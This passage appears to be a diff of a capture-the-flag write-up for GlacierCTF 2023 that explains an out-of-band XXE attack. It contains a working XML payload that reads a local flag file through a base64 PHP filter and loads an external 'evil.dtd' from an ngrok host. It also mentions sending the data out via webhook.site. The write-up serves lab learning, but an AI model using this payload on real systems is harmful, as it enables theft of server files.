kashmir54/kashmir54.github.io/_ctfs/GlacierCTF2023/index.md

 <!DOCTYPE data [<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.txt"><!ENTITY % dtd SYSTEM "https://3f56-92-56-131-173.ngrok-free.app/evil.dtd"> %dtd; %send;]><markers><marker><lat>47.0748663672</lat><lon>12.695247219</lon><name>test</name></marker></markers>
 ```

-To exfiltrate the flag we used webhook.site, but we could also use the ngrok URL.
-External DTD:
+4 - To exfiltrate the flag we used webhook.site, but we could also use the ngrok URL.
+The external DTD will use the %file entity from the XML payload, which will contain the flag encoded with base64 once loaded:

 ```xml
 <!-- evil.dtd entity hosted on our server -->